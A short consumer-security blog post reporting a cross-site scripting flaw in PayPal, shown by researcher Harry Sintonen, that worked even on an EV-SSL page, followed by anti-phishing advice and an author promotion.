A Finnish researcher has found a serious cross-site scripting (XSS) flaw in PayPal, that could be used to steal a user’s login info or cookies. is used by sites that allow users to enter data. If the script code or links are not properly validated, you could be redirected to another, perhaps malicious Web site. Or your passwords could be stolen, or a hacker could execute his code on your computer.

The researcher, Harry Sintonen, apparently demonstrated just such an XSS attack a few days ago. Users logged in on a Web page, but their credentials were sent to, shall we say, an unauthorized server.

Even more worrisome, the attack succeeded on a page using the new EV-SSL or Extended Validation SSL certificate. This type of security certificate does more extensive checks as to the identity of the requesting site than the older, regular SSL certificate. Internet Explorer 7 and the soon-to-be-released Firefox 3 have an address bar that turns green when rendering a site using .

During Sintonen’s demonstration, however, the address bar remained green. Recently, PayPal said that EV-SSL was essential to combat fraud, and threatened to ban browsers that don’t support it. It seems that more work needs to be done on the whole concept of certificates. EV-SSL looked like a good idea, but it cannot guarantee that a page is free of security threats.

PayPal is aware of this XSS flaw, and is working quickly to fix it, if it hasn’t done so already. No phishing attacks have occurred yet using the flaw, said the company. Even so, be on guard against emails purporting to be from PayPal or its parent, eBay. Never click on links in these emails. To go to one of these company’s Web sites, type the address manually into your browser address bar.

Syd Tash is a noted computer security consultant and author of How to Protect Your Computer Online. He has been keeping Internet surfers safe and secure since the last century. Find out how he does it; protect your own computer with five layers of protection right here:
= > http://MyPCSecuritySite.com

You may include these Tips in your Web sites and publications provided they remain unchanged and include the above paragraph, with the author’s name and Web site. You can also get a direct URL to this post. Click the title, then copy the URL in the browser address bar.

If you're new here, you may want to subscribe to my RSS feed. Thanks for visiting!